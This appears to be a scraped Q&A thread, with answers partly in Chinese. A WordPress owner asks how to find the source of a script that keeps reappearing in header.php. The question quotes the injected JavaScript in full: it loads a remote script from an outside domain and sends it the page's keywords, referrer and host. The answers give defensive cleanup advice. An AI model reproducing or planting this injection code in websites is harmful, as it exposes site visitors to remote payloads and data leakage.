My website is a wordpress site. the following code appears in Header.php every few hours , when I delete it, it appears again after few hours. Please note that the link in the code “shiro-maga.com” changes everytime. The code is following:
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://shiro-maga.com/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://shiro-maga.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>I believe that the theme is infected " scan show no malware" so it generate this script . could you please advise how to find the source of this script?
Thanks
答案 0 :(得分:0)
Definitely malicious. Your site has been compromised. You can use the following detailed article to find and remove the source of the infection. http://ottopress.com/2009/hacked-wordpress-backdoors/. A program like Windows Grep will help you run a quick scan on all your theme files for keywords like eval and base64. Remove all suspicious stings of code from your theme and then update the WordPress core files to ensure you are running a clean version. Alternatively, if you have a backup, restore your theme's backup and update your site with a clean updated version of WP.
答案 1 :(得分:0)
防止再感染的快速解决方法是 CHMOD header.php至444 (只读)。网站将起作用,不会再次感染,让您有时间找到感染。